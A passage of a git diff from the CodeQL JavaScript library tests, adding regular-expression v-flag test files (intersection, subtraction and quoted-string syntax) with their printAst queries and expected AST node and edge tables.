[[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]] | tst.js:1:2:1:42 | [RegExpSubtraction] [[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]] | semmle.label | 0 | +| tst.js:1:2:1:42 | [RegExpCharacterClass] [[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]] | tst.js:1:2:1:42 | [RegExpSubtraction] [[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]] | semmle.order | 0 | +| tst.js:1:2:1:42 | [RegExpSubtraction] [[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]] | tst.js:1:3:1:15 | [RegExpCharacterClass] [[ab1]&&[b1]] | semmle.label | 0 | +| tst.js:1:2:1:42 | [RegExpSubtraction] [[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]] | tst.js:1:3:1:15 | [RegExpCharacterClass] [[ab1]&&[b1]] | semmle.order | 0 | +| tst.js:1:2:1:42 | [RegExpSubtraction] [[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]] | tst.js:1:18:1:20 | [RegExpCharacterClass] [a] | semmle.label | 1 | +| tst.js:1:2:1:42 | [RegExpSubtraction] [[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]] | tst.js:1:18:1:20 | [RegExpCharacterClass] [a] | semmle.order | 1 | +| tst.js:1:2:1:42 | [RegExpSubtraction] [[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]] | tst.js:1:23:1:41 | [RegExpCharacterClass] [\\p{Number}\\q{z\|a}] | semmle.label | 2 | +| tst.js:1:2:1:42 | [RegExpSubtraction] [[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]] | tst.js:1:23:1:41 | [RegExpCharacterClass] [\\p{Number}\\q{z\|a}] | semmle.order | 2 | +| tst.js:1:3:1:15 | [RegExpCharacterClass] [[ab1]&&[b1]] | tst.js:1:3:1:15 | [RegExpIntersection] [[ab1]&&[b1]] | semmle.label | 0 | +| tst.js:1:3:1:15 | [RegExpCharacterClass] [[ab1]&&[b1]] | tst.js:1:3:1:15 | [RegExpIntersection] [[ab1]&&[b1]] | semmle.order | 0 | +| tst.js:1:3:1:15 | [RegExpIntersection] [[ab1]&&[b1]] | tst.js:1:4:1:8 | [RegExpCharacterClass] [ab1] | semmle.label | 0 | +| tst.js:1:3:1:15 | [RegExpIntersection] [[ab1]&&[b1]] | tst.js:1:4:1:8 | [RegExpCharacterClass] [ab1] | semmle.order | 0 | +| tst.js:1:3:1:15 | [RegExpIntersection] [[ab1]&&[b1]] | tst.js:1:11:1:14 | [RegExpCharacterClass] [b1] | semmle.label | 1 | +| tst.js:1:3:1:15 | [RegExpIntersection] [[ab1]&&[b1]] | tst.js:1:11:1:14 | [RegExpCharacterClass] [b1] | semmle.order | 1 | +| tst.js:1:4:1:8 | [RegExpCharacterClass] [ab1] | tst.js:1:5:1:5 | [RegExpNormalConstant] a | semmle.label | 0 | +| tst.js:1:4:1:8 | [RegExpCharacterClass] [ab1] | tst.js:1:5:1:5 | [RegExpNormalConstant] a | semmle.order | 0 | +| tst.js:1:4:1:8 | [RegExpCharacterClass] [ab1] | tst.js:1:6:1:6 | [RegExpNormalConstant] b | semmle.label | 1 | +| tst.js:1:4:1:8 | [RegExpCharacterClass] [ab1] | tst.js:1:6:1:6 | [RegExpNormalConstant] b | semmle.order | 1 | +| tst.js:1:4:1:8 | [RegExpCharacterClass] [ab1] | tst.js:1:7:1:7 | [RegExpNormalConstant] 1 | semmle.label | 2 | +| tst.js:1:4:1:8 | [RegExpCharacterClass] [ab1] | tst.js:1:7:1:7 | [RegExpNormalConstant] 1 | semmle.order | 2 | +| tst.js:1:11:1:14 | [RegExpCharacterClass] [b1] | tst.js:1:12:1:12 | [RegExpNormalConstant] b | semmle.label | 0 | +| tst.js:1:11:1:14 | [RegExpCharacterClass] [b1] | tst.js:1:12:1:12 | [RegExpNormalConstant] b | semmle.order | 0 | +| tst.js:1:11:1:14 | [RegExpCharacterClass] [b1] | tst.js:1:13:1:13 | [RegExpNormalConstant] 1 | semmle.label | 1 | +| tst.js:1:11:1:14 | [RegExpCharacterClass] [b1] | tst.js:1:13:1:13 | [RegExpNormalConstant] 1 | semmle.order | 1 | +| tst.js:1:18:1:20 | [RegExpCharacterClass] [a] | tst.js:1:19:1:19 | [RegExpNormalConstant] a | semmle.label | 0 | +| tst.js:1:18:1:20 | [RegExpCharacterClass] [a] | tst.js:1:19:1:19 | [RegExpNormalConstant] a | semmle.order | 0 | +| tst.js:1:23:1:41 | [RegExpCharacterClass] [\\p{Number}\\q{z\|a}] | tst.js:1:24:1:33 | [RegExpUnicodePropertyEscape] \\p{Number} | semmle.label | 0 | +| tst.js:1:23:1:41 | [RegExpCharacterClass] [\\p{Number}\\q{z\|a}] | tst.js:1:24:1:33 | [RegExpUnicodePropertyEscape] \\p{Number} | semmle.order | 0 | +| tst.js:1:23:1:41 | [RegExpCharacterClass] [\\p{Number}\\q{z\|a}] | tst.js:1:34:1:40 | [RegExpQuotedString] \\q{z\|a} | semmle.label | 1 | +| tst.js:1:23:1:41 | [RegExpCharacterClass] [\\p{Number}\\q{z\|a}] | tst.js:1:34:1:40 | [RegExpQuotedString] \\q{z\|a} | semmle.order | 1 | +| tst.js:1:34:1:40 | [RegExpQuotedString] \\q{z\|a} | tst.js:1:37:1:39 | [RegExpAlt] z\|a | semmle.label | 0 | +| tst.js:1:34:1:40 | [RegExpQuotedString] \\q{z\|a} | tst.js:1:37:1:39 | [RegExpAlt] z\|a | semmle.order | 0 | +| tst.js:1:37:1:39 | [RegExpAlt] z\|a | tst.js:1:37:1:37 | [RegExpNormalConstant] z | semmle.label | 0 | +| tst.js:1:37:1:39 | [RegExpAlt] z\|a | tst.js:1:37:1:37 | [RegExpNormalConstant] z | semmle.order | 0 | +| tst.js:1:37:1:39 | [RegExpAlt] z\|a | tst.js:1:39:1:39 | [RegExpNormalConstant] a | semmle.label | 1 | +| tst.js:1:37:1:39 | [RegExpAlt] z\|a | tst.js:1:39:1:39 | [RegExpNormalConstant] a | semmle.order | 1 | +graphProperties +| semmle.graphKind | tree | diff --git a/javascript/ql/test/library-tests/RegExp/VFlagOperations/CombinationOfOperators/printAst.ql b/javascript/ql/test/library-tests/RegExp/VFlagOperations/CombinationOfOperators/printAst.ql new file mode 100644 index 000000000000..8ceaf83964a3 --- /dev/null +++ b/javascript/ql/test/library-tests/RegExp/VFlagOperations/CombinationOfOperators/printAst.ql @@ -0,0 +1 @@ +import semmle.javascript.PrintAst diff --git a/javascript/ql/test/library-tests/RegExp/VFlagOperations/CombinationOfOperators/tst.js b/javascript/ql/test/library-tests/RegExp/VFlagOperations/CombinationOfOperators/tst.js new file mode 100644 index 000000000000..bc9b0a966a44 --- /dev/null +++ b/javascript/ql/test/library-tests/RegExp/VFlagOperations/CombinationOfOperators/tst.js @@ -0,0 +1 @@ +/[[[ab1]&&[b1]]--[a]--[\p{Number}\q{z|a}]]/v; diff --git a/javascript/ql/test/library-tests/RegExp/VFlagOperations/Intersection/printAst.expected b/javascript/ql/test/library-tests/RegExp/VFlagOperations/Intersection/printAst.expected new file mode 100644 index 000000000000..39aec1194e2a --- /dev/null +++ b/javascript/ql/test/library-tests/RegExp/VFlagOperations/Intersection/printAst.expected @@ -0,0 +1,91 @@ +nodes +| tst.js:1:1:1:23 | [RegExpLiteral] /[[abc]&&[bcd]&&[cd]]/v | semmle.label | [RegExpLiteral] /[[abc]&&[bcd]&&[cd]]/v | +| tst.js:1:1:1:24 | [ExprStmt] /[[abc] ... cd]]/v; | semmle.label | [ExprStmt] /[[abc] ... cd]]/v; | +| tst.js:1:1:1:24 | [ExprStmt] /[[abc] ... cd]]/v; | semmle.order | 1 | +| tst.js:1:2:1:21 | [RegExpCharacterClass] [[abc]&&[bcd]&&[cd]] | semmle.label | [RegExpCharacterClass] [[abc]&&[bcd]&&[cd]] | +| tst.js:1:2:1:21 | [RegExpIntersection] [[abc]&&[bcd]&&[cd]] | semmle.label | [RegExpIntersection] [[abc]&&[bcd]&&[cd]] | +| tst.js:1:3:1:7 | [RegExpCharacterClass] [abc] | semmle.label | [RegExpCharacterClass] [abc] | +| tst.js:1:4:1:4 | [RegExpNormalConstant] a | semmle.label | [RegExpNormalConstant] a | +| tst.js:1:5:1:5 | [RegExpNormalConstant] b | semmle.label | [RegExpNormalConstant] b | +| tst.js:1:6:1:6 | [RegExpNormalConstant] c | semmle.label | [RegExpNormalConstant] c | +| tst.js:1:10:1:14 | [RegExpCharacterClass] [bcd] | semmle.label | [RegExpCharacterClass] [bcd] | +| tst.js:1:11:1:11 | [RegExpNormalConstant] b | semmle.label | [RegExpNormalConstant] b | +| tst.js:1:12:1:12 | [RegExpNormalConstant] c | semmle.label | [RegExpNormalConstant] c | +| tst.js:1:13:1:13 | [RegExpNormalConstant] d | semmle.label | [RegExpNormalConstant] d | +| tst.js:1:17:1:20 | [RegExpCharacterClass] [cd] | semmle.label | [RegExpCharacterClass] [cd] | +| tst.js:1:18:1:18 | [RegExpNormalConstant] c | semmle.label | [RegExpNormalConstant] c | +| tst.js:1:19:1:19 | [RegExpNormalConstant] d | semmle.label | [RegExpNormalConstant] d | +| tst.js:2:1:2:11 | [RegExpLiteral] /abc&&bcd/v | semmle.label | [RegExpLiteral] /abc&&bcd/v | +| tst.js:2:1:2:12 | [ExprStmt] /abc&&bcd/v; | semmle.label | [ExprStmt] /abc&&bcd/v; | +| tst.js:2:1:2:12 | [ExprStmt] /abc&&bcd/v; | semmle.order | 2 | +| tst.js:2:2:2:9 | [RegExpNormalConstant] abc&&bcd | semmle.label | [RegExpNormalConstant] abc&&bcd | +| tst.js:3:1:3:15 | [RegExpLiteral] /[abc]&&[bcd]/v | semmle.label | [RegExpLiteral] /[abc]&&[bcd]/v | +| tst.js:3:1:3:16 | [ExprStmt] /[abc]&&[bcd]/v; | semmle.label | [ExprStmt] /[abc]&&[bcd]/v; | +| tst.js:3:1:3:16 | [ExprStmt] /[abc]&&[bcd]/v; | semmle.order | 3 | +| tst.js:3:2:3:6 | [RegExpCharacterClass] [abc] | semmle.label | [RegExpCharacterClass] [abc] | +| tst.js:3:2:3:13 | [RegExpSequence] [abc]&&[bcd] | semmle.label | [RegExpSequence] [abc]&&[bcd] | +| tst.js:3:3:3:3 | [RegExpNormalConstant] a | semmle.label | [RegExpNormalConstant] a | +| tst.js:3:4:3:4 | [RegExpNormalConstant] b | semmle.label | [RegExpNormalConstant] b | +| tst.js:3:5:3:5 | [RegExpNormalConstant] c | semmle.label | [RegExpNormalConstant] c | +| tst.js:3:7:3:8 | [RegExpNormalConstant] && | semmle.label | [RegExpNormalConstant] && | +| tst.js:3:9:3:13 | [RegExpCharacterClass] [bcd] | semmle.label | [RegExpCharacterClass] [bcd] | +| tst.js:3:10:3:10 | [RegExpNormalConstant] b | semmle.label | [RegExpNormalConstant] b | +| tst.js:3:11:3:11 | [RegExpNormalConstant] c | semmle.label | [RegExpNormalConstant] c | +| tst.js:3:12:3:12 | [RegExpNormalConstant] d | semmle.label | [RegExpNormalConstant] d | +edges +| tst.js:1:1:1:23 | [RegExpLiteral] /[[abc]&&[bcd]&&[cd]]/v | tst.js:1:2:1:21 | [RegExpCharacterClass] [[abc]&&[bcd]&&[cd]] | semmle.label | 0 | +| tst.js:1:1:1:23 | [RegExpLiteral] /[[abc]&&[bcd]&&[cd]]/v | tst.js:1:2:1:21 | [RegExpCharacterClass] [[abc]&&[bcd]&&[cd]] | semmle.order | 0 | +| tst.js:1:1:1:24 | [ExprStmt] /[[abc] ... cd]]/v; | tst.js:1:1:1:23 | [RegExpLiteral] /[[abc]&&[bcd]&&[cd]]/v | semmle.label | 1 | +| tst.js:1:1:1:24 | [ExprStmt] /[[abc] ... cd]]/v; | tst.js:1:1:1:23 | [RegExpLiteral] /[[abc]&&[bcd]&&[cd]]/v | semmle.order | 1 | +| tst.js:1:2:1:21 | [RegExpCharacterClass] [[abc]&&[bcd]&&[cd]] | tst.js:1:2:1:21 | [RegExpIntersection] [[abc]&&[bcd]&&[cd]] | semmle.label | 0 | +| tst.js:1:2:1:21 | [RegExpCharacterClass] [[abc]&&[bcd]&&[cd]] | tst.js:1:2:1:21 | [RegExpIntersection] [[abc]&&[bcd]&&[cd]] | semmle.order | 0 | +| tst.js:1:2:1:21 | [RegExpIntersection] [[abc]&&[bcd]&&[cd]] | tst.js:1:3:1:7 | [RegExpCharacterClass] [abc] | semmle.label | 0 | +| tst.js:1:2:1:21 | [RegExpIntersection] [[abc]&&[bcd]&&[cd]] | tst.js:1:3:1:7 | [RegExpCharacterClass] [abc] | semmle.order | 0 | +| tst.js:1:2:1:21 | [RegExpIntersection] [[abc]&&[bcd]&&[cd]] | tst.js:1:10:1:14 | [RegExpCharacterClass] [bcd] | semmle.label | 1 | +| tst.js:1:2:1:21 | [RegExpIntersection] [[abc]&&[bcd]&&[cd]] | tst.js:1:10:1:14 | [RegExpCharacterClass] [bcd] | semmle.order | 1 | +| tst.js:1:2:1:21 | [RegExpIntersection] [[abc]&&[bcd]&&[cd]] | tst.js:1:17:1:20 | [RegExpCharacterClass] [cd] | semmle.label | 2 | +| tst.js:1:2:1:21 | [RegExpIntersection] [[abc]&&[bcd]&&[cd]] | tst.js:1:17:1:20 | [RegExpCharacterClass] [cd] | semmle.order | 2 | +| tst.js:1:3:1:7 | [RegExpCharacterClass] [abc] | tst.js:1:4:1:4 | [RegExpNormalConstant] a | semmle.label | 0 | +| tst.js:1:3:1:7 | [RegExpCharacterClass] [abc] | tst.js:1:4:1:4 | [RegExpNormalConstant] a | semmle.order | 0 | +| tst.js:1:3:1:7 | [RegExpCharacterClass] [abc] | tst.js:1:5:1:5 | [RegExpNormalConstant] b | semmle.label | 1 | +| tst.js:1:3:1:7 | [RegExpCharacterClass] [abc] | tst.js:1:5:1:5 | [RegExpNormalConstant] b | semmle.order | 1 | +| tst.js:1:3:1:7 | [RegExpCharacterClass] [abc] | tst.js:1:6:1:6 | [RegExpNormalConstant] c | semmle.label | 2 | +| tst.js:1:3:1:7 | [RegExpCharacterClass] [abc] | tst.js:1:6:1:6 | [RegExpNormalConstant] c | semmle.order | 2 | +| tst.js:1:10:1:14 | [RegExpCharacterClass] [bcd] | tst.js:1:11:1:11 | [RegExpNormalConstant] b | semmle.label | 0 | +| tst.js:1:10:1:14 | [RegExpCharacterClass] [bcd] | tst.js:1:11:1:11 | [RegExpNormalConstant] b | semmle.order | 0 | +| tst.js:1:10:1:14 | [RegExpCharacterClass] [bcd] | tst.js:1:12:1:12 | [RegExpNormalConstant] c | semmle.label | 1 | +| tst.js:1:10:1:14 | [RegExpCharacterClass] [bcd] | tst.js:1:12:1:12 | [RegExpNormalConstant] c | semmle.order | 1 | +| tst.js:1:10:1:14 | [RegExpCharacterClass] [bcd] | tst.js:1:13:1:13 | [RegExpNormalConstant] d | semmle.label | 2 | +| tst.js:1:10:1:14 | [RegExpCharacterClass] [bcd] | tst.js:1:13:1:13 | [RegExpNormalConstant] d | semmle.order | 2 | +| tst.js:1:17:1:20 | [RegExpCharacterClass] [cd] | tst.js:1:18:1:18 | [RegExpNormalConstant] c | semmle.label | 0 | +| tst.js:1:17:1:20 | [RegExpCharacterClass] [cd] | tst.js:1:18:1:18 | [RegExpNormalConstant] c | semmle.order | 0 | +| tst.js:1:17:1:20 | [RegExpCharacterClass] [cd] | tst.js:1:19:1:19 | [RegExpNormalConstant] d | semmle.label | 1 | +| tst.js:1:17:1:20 | [RegExpCharacterClass] [cd] | tst.js:1:19:1:19 | [RegExpNormalConstant] d | semmle.order | 1 | +| tst.js:2:1:2:11 | [RegExpLiteral] /abc&&bcd/v | tst.js:2:2:2:9 | [RegExpNormalConstant] abc&&bcd | semmle.label | 0 | +| tst.js:2:1:2:11 | [RegExpLiteral] /abc&&bcd/v | tst.js:2:2:2:9 | [RegExpNormalConstant] abc&&bcd | semmle.order | 0 | +| tst.js:2:1:2:12 | [ExprStmt] /abc&&bcd/v; | tst.js:2:1:2:11 | [RegExpLiteral] /abc&&bcd/v | semmle.label | 1 | +| tst.js:2:1:2:12 | [ExprStmt] /abc&&bcd/v; | tst.js:2:1:2:11 | [RegExpLiteral] /abc&&bcd/v | semmle.order | 1 | +| tst.js:3:1:3:15 | [RegExpLiteral] /[abc]&&[bcd]/v | tst.js:3:2:3:13 | [RegExpSequence] [abc]&&[bcd] | semmle.label | 0 | +| tst.js:3:1:3:15 | [RegExpLiteral] /[abc]&&[bcd]/v | tst.js:3:2:3:13 | [RegExpSequence] [abc]&&[bcd] | semmle.order | 0 | +| tst.js:3:1:3:16 | [ExprStmt] /[abc]&&[bcd]/v; | tst.js:3:1:3:15 | [RegExpLiteral] /[abc]&&[bcd]/v | semmle.label | 1 | +| tst.js:3:1:3:16 | [ExprStmt] /[abc]&&[bcd]/v; | tst.js:3:1:3:15 | [RegExpLiteral] /[abc]&&[bcd]/v | semmle.order | 1 | +| tst.js:3:2:3:6 | [RegExpCharacterClass] [abc] | tst.js:3:3:3:3 | [RegExpNormalConstant] a | semmle.label | 0 | +| tst.js:3:2:3:6 | [RegExpCharacterClass] [abc] | tst.js:3:3:3:3 | [RegExpNormalConstant] a | semmle.order | 0 | +| tst.js:3:2:3:6 | [RegExpCharacterClass] [abc] | tst.js:3:4:3:4 | [RegExpNormalConstant] b | semmle.label | 1 | +| tst.js:3:2:3:6 | [RegExpCharacterClass] [abc] | tst.js:3:4:3:4 | [RegExpNormalConstant] b | semmle.order | 1 | +| tst.js:3:2:3:6 | [RegExpCharacterClass] [abc] | tst.js:3:5:3:5 | [RegExpNormalConstant] c | semmle.label | 2 | +| tst.js:3:2:3:6 | [RegExpCharacterClass] [abc] | tst.js:3:5:3:5 | [RegExpNormalConstant] c | semmle.order | 2 | +| tst.js:3:2:3:13 | [RegExpSequence] [abc]&&[bcd] | tst.js:3:2:3:6 | [RegExpCharacterClass] [abc] | semmle.label | 0 | +| tst.js:3:2:3:13 | [RegExpSequence] [abc]&&[bcd] | tst.js:3:2:3:6 | [RegExpCharacterClass] [abc] | semmle.order | 0 | +| tst.js:3:2:3:13 | [RegExpSequence] [abc]&&[bcd] | tst.js:3:7:3:8 | [RegExpNormalConstant] && | semmle.label | 1 | +| tst.js:3:2:3:13 | [RegExpSequence] [abc]&&[bcd] | tst.js:3:7:3:8 | [RegExpNormalConstant] && | semmle.order | 1 | +| tst.js:3:2:3:13 | [RegExpSequence] [abc]&&[bcd] | tst.js:3:9:3:13 | [RegExpCharacterClass] [bcd] | semmle.label | 2 | +| tst.js:3:2:3:13 | [RegExpSequence] [abc]&&[bcd] | tst.js:3:9:3:13 | [RegExpCharacterClass] [bcd] | semmle.order | 2 | +| tst.js:3:9:3:13 | [RegExpCharacterClass] [bcd] | tst.js:3:10:3:10 | [RegExpNormalConstant] b | semmle.label | 0 | +| tst.js:3:9:3:13 | [RegExpCharacterClass] [bcd] | tst.js:3:10:3:10 | [RegExpNormalConstant] b | semmle.order | 0 | +| tst.js:3:9:3:13 | [RegExpCharacterClass] [bcd] | tst.js:3:11:3:11 | [RegExpNormalConstant] c | semmle.label | 1 | +| tst.js:3:9:3:13 | [RegExpCharacterClass] [bcd] | tst.js:3:11:3:11 | [RegExpNormalConstant] c | semmle.order | 1 | +| tst.js:3:9:3:13 | [RegExpCharacterClass] [bcd] | tst.js:3:12:3:12 | [RegExpNormalConstant] d | semmle.label | 2 | +| tst.js:3:9:3:13 | [RegExpCharacterClass] [bcd] | tst.js:3:12:3:12 | [RegExpNormalConstant] d | semmle.order | 2 | +graphProperties +| semmle.graphKind | tree | diff --git a/javascript/ql/test/library-tests/RegExp/VFlagOperations/Intersection/printAst.ql b/javascript/ql/test/library-tests/RegExp/VFlagOperations/Intersection/printAst.ql new file mode 100644 index 000000000000..8ceaf83964a3 --- /dev/null +++ b/javascript/ql/test/library-tests/RegExp/VFlagOperations/Intersection/printAst.ql @@ -0,0 +1 @@ +import semmle.javascript.PrintAst diff --git a/javascript/ql/test/library-tests/RegExp/VFlagOperations/Intersection/tst.js b/javascript/ql/test/library-tests/RegExp/VFlagOperations/Intersection/tst.js new file mode 100644 index 000000000000..b2aa6fc6322e --- /dev/null +++ b/javascript/ql/test/library-tests/RegExp/VFlagOperations/Intersection/tst.js @@ -0,0 +1,6 @@ +/[[abc]&&[bcd]&&[cd]]/v; // Valid use of intersection operator, matches b or c +/abc&&bcd/v; //Valid regex, but no intersection operation: Matches the literal string "abc&&bcd" +/[abc]&&[bcd]/v; // Valid regex, but incorrect intersection operation: + // - Matches a single character from [abc] + // - Then the literal "&&" + // - Then a single character from [bcd] diff --git a/javascript/ql/test/library-tests/RegExp/VFlagOperations/QuotedString/printAst.expected b/javascript/ql/test/library-tests/RegExp/VFlagOperations/QuotedString/printAst.expected new file mode 100644 index 000000000000..fc47fce03cd4 --- /dev/null +++ b/javascript/ql/test/library-tests/RegExp/VFlagOperations/QuotedString/printAst.expected @@ -0,0 +1,121 @@ +nodes +| tst.js:1:1:1:12 | [RegExpLiteral] /[\\q{abc}]/v | semmle.label | [RegExpLiteral] /[\\q{abc}]/v | +| tst.js:1:1:1:13 | [ExprStmt] /[\\q{abc}]/v; | semmle.label | [ExprStmt] /[\\q{abc}]/v; | +| tst.js:1:1:1:13 | [ExprStmt] /[\\q{abc}]/v; | semmle.order | 1 | +| tst.js:1:2:1:10 | [RegExpCharacterClass] [\\q{abc}] | semmle.label | [RegExpCharacterClass] [\\q{abc}] | +| tst.js:1:3:1:9 | [RegExpQuotedString] \\q{abc} | semmle.label | [RegExpQuotedString] \\q{abc} | +| tst.js:1:6:1:8 | [RegExpNormalConstant] abc | semmle.label | [RegExpNormalConstant] abc | +| tst.js:2:1:2:20 | [RegExpLiteral] /[\\q{abc\|cbd\|dcb}]/v | semmle.label | [RegExpLiteral] /[\\q{abc\|cbd\|dcb}]/v | +| tst.js:2:1:2:21 | [ExprStmt] /[\\q{ab ... cb}]/v; | semmle.label | [ExprStmt] /[\\q{ab ... cb}]/v; | +| tst.js:2:1:2:21 | [ExprStmt] /[\\q{ab ... cb}]/v; | semmle.order | 2 | +| tst.js:2:2:2:18 | [RegExpCharacterClass] [\\q{abc\|cbd\|dcb}] | semmle.label | [RegExpCharacterClass] [\\q{abc\|cbd\|dcb}] | +| tst.js:2:3:2:17 | [RegExpQuotedString] \\q{abc\|cbd\|dcb} | semmle.label | [RegExpQuotedString] \\q{abc\|cbd\|dcb} | +| tst.js:2:6:2:8 | [RegExpNormalConstant] abc | semmle.label | [RegExpNormalConstant] abc | +| tst.js:2:6:2:16 | [RegExpAlt] abc\|cbd\|dcb | semmle.label | [RegExpAlt] abc\|cbd\|dcb | +| tst.js:2:10:2:12 | [RegExpNormalConstant] cbd | semmle.label | [RegExpNormalConstant] cbd | +| tst.js:2:14:2:16 | [RegExpNormalConstant] dcb | semmle.label | [RegExpNormalConstant] dcb | +| tst.js:3:1:3:11 | [RegExpLiteral] /[\\q{\\}}]/v | semmle.label | [RegExpLiteral] /[\\q{\\}}]/v | +| tst.js:3:1:3:12 | [ExprStmt] /[\\q{\\}}]/v; | semmle.label | [ExprStmt] /[\\q{\\}}]/v; | +| tst.js:3:1:3:12 | [ExprStmt] /[\\q{\\}}]/v; | semmle.order | 3 | +| tst.js:3:2:3:9 | [RegExpCharacterClass] [\\q{\\}}] | semmle.label | [RegExpCharacterClass] [\\q{\\}}] | +| tst.js:3:3:3:8 | [RegExpQuotedString] \\q{\\}} | semmle.label | [RegExpQuotedString] \\q{\\}} | +| tst.js:3:6:3:7 | [RegExpNormalConstant] \\} | semmle.label | [RegExpNormalConstant] \\} | +| tst.js:4:1:4:11 | [RegExpLiteral] /[\\q{\\{}]/v | semmle.label | [RegExpLiteral] /[\\q{\\{}]/v | +| tst.js:4:1:4:12 | [ExprStmt] /[\\q{\\{}]/v; | semmle.label | [ExprStmt] /[\\q{\\{}]/v; | +| tst.js:4:1:4:12 | [ExprStmt] /[\\q{\\{}]/v; | semmle.order | 4 | +| tst.js:4:2:4:9 | [RegExpCharacterClass] [\\q{\\{}] | semmle.label | [RegExpCharacterClass] [\\q{\\{}] | +| tst.js:4:3:4:8 | [RegExpQuotedString] \\q{\\{} | semmle.label | [RegExpQuotedString] \\q{\\{} | +| tst.js:4:6:4:7 | [RegExpNormalConstant] \\{ | semmle.label | [RegExpNormalConstant] \\{ | +| tst.js:5:1:5:18 | [RegExpLiteral] /[\\q{cc\|\\}a\|cc}]/v | semmle.label | [RegExpLiteral] /[\\q{cc\|\\}a\|cc}]/v | +| tst.js:5:1:5:19 | [ExprStmt] /[\\q{cc\|\\}a\|cc}]/v; | semmle.label | [ExprStmt] /[\\q{cc\|\\}a\|cc}]/v; | +| tst.js:5:1:5:19 | [ExprStmt] /[\\q{cc\|\\}a\|cc}]/v; | semmle.order | 5 | +| tst.js:5:2:5:16 | [RegExpCharacterClass] [\\q{cc\|\\}a\|cc}] | semmle.label | [RegExpCharacterClass] [\\q{cc\|\\}a\|cc}] | +| tst.js:5:3:5:15 | [RegExpQuotedString] \\q{cc\|\\}a\|cc} | semmle.label | [RegExpQuotedString] \\q{cc\|\\}a\|cc} | +| tst.js:5:6:5:7 | [RegExpNormalConstant] cc | semmle.label | [RegExpNormalConstant] cc | +| tst.js:5:6:5:14 | [RegExpAlt] cc\|\\}a\|cc | semmle.label | [RegExpAlt] cc\|\\}a\|cc | +| tst.js:5:9:5:11 | [RegExpNormalConstant] \\}a | semmle.label | [RegExpNormalConstant] \\}a | +| tst.js:5:13:5:14 | [RegExpNormalConstant] cc | semmle.label | [RegExpNormalConstant] cc | +| tst.js:6:1:6:12 | [RegExpLiteral] /[\\qq{a\|b}]/ | semmle.label | [RegExpLiteral] /[\\qq{a\|b}]/ | +| tst.js:6:1:6:13 | [ExprStmt] /[\\qq{a\|b}]/; | semmle.label | [ExprStmt] /[\\qq{a\|b}]/; | +| tst.js:6:1:6:13 | [ExprStmt] /[\\qq{a\|b}]/; | semmle.order | 6 | +| tst.js:6:2:6:11 | [RegExpCharacterClass] [\\qq{a\|b}] | semmle.label | [RegExpCharacterClass] [\\qq{a\|b}] | +| tst.js:6:3:6:4 | [RegExpIdentityEscape] \\q | semmle.label | [RegExpIdentityEscape] \\q | +| tst.js:6:5:6:5 | [RegExpNormalConstant] q | semmle.label | [RegExpNormalConstant] q | +| tst.js:6:6:6:6 | [RegExpNormalConstant] { | semmle.label | [RegExpNormalConstant] { | +| tst.js:6:7:6:7 | [RegExpNormalConstant] a | semmle.label | [RegExpNormalConstant] a | +| tst.js:6:8:6:8 | [RegExpNormalConstant] \| | semmle.label | [RegExpNormalConstant] \| | +| tst.js:6:9:6:9 | [RegExpNormalConstant] b | semmle.label | [RegExpNormalConstant] b | +| tst.js:6:10:6:10 | [RegExpNormalConstant] } | semmle.label | [RegExpNormalConstant] } | +edges +| tst.js:1:1:1:12 | [RegExpLiteral] /[\\q{abc}]/v | tst.js:1:2:1:10 | [RegExpCharacterClass] [\\q{abc}] | semmle.label | 0 | +| tst.js:1:1:1:12 | [RegExpLiteral] /[\\q{abc}]/v | tst.js:1:2:1:10 | [RegExpCharacterClass] [\\q{abc}] | semmle.order | 0 | +| tst.js:1:1:1:13 | [ExprStmt] /[\\q{abc}]/v; | tst.js:1:1:1:12 | [RegExpLiteral] /[\\q{abc}]/v | semmle.label | 1 | +| tst.js:1:1:1:13 | [ExprStmt] /[\\q{abc}]/v; | tst.js:1:1:1:12 | [RegExpLiteral] /[\\q{abc}]/v | semmle.order | 1 | +| tst.js:1:2:1:10 | [RegExpCharacterClass] [\\q{abc}] | tst.js:1:3:1:9 | [RegExpQuotedString] \\q{abc} | semmle.label | 0 | +| tst.js:1:2:1:10 | [RegExpCharacterClass] [\\q{abc}] | tst.js:1:3:1:9 | [RegExpQuotedString] \\q{abc} | semmle.order | 0 | +| tst.js:1:3:1:9 | [RegExpQuotedString] \\q{abc} | tst.js:1:6:1:8 | [RegExpNormalConstant] abc | semmle.label | 0 | +| tst.js:1:3:1:9 | [RegExpQuotedString] \\q{abc} | tst.js:1:6:1:8 | [RegExpNormalConstant] abc | semmle.order | 0 | +| tst.js:2:1:2:20 | [RegExpLiteral] /[\\q{abc\|cbd\|dcb}]/v | tst.js:2:2:2:18 | [RegExpCharacterClass] [\\q{abc\|cbd\|dcb}] | semmle.label | 0 | +| tst.js:2:1:2:20 | [RegExpLiteral] /[\\q{abc\|cbd\|dcb}]/v | tst.js:2:2:2:18 | [RegExpCharacterClass] [\\q{abc\|cbd\|dcb}] | semmle.order | 0 | +| tst.js:2:1:2:21 | [ExprStmt] /[\\q{ab ... cb}]/v; | tst.js:2:1:2:20 | [RegExpLiteral] /[\\q{abc\|cbd\|dcb}]/v | semmle.label | 1 | +| tst.js:2:1:2:21 | [ExprStmt] /[\\q{ab ... cb}]/v; | tst.js:2:1:2:20 | [RegExpLiteral] /[\\q{abc\|cbd\|dcb}]/v | semmle.order | 1 | +| tst.js:2:2:2:18 | [RegExpCharacterClass] [\\q{abc\|cbd\|dcb}] | tst.js:2:3:2:17 | [RegExpQuotedString] \\q{abc\|cbd\|dcb} | semmle.label | 0 | +| tst.js:2:2:2:18 | [RegExpCharacterClass] [\\q{abc\|cbd\|dcb}] | tst.js:2:3:2:17 | [RegExpQuotedString] \\q{abc\|cbd\|dcb} | semmle.order | 0 | +| tst.js:2:3:2:17 | [RegExpQuotedString] \\q{abc\|cbd\|dcb} | tst.js:2:6:2:16 | [RegExpAlt] abc\|cbd\|dcb | semmle.label | 0 | +| tst.js:2:3:2:17 | [RegExpQuotedString] \\q{abc\|cbd\|dcb} | tst.js:2:6:2:16 | 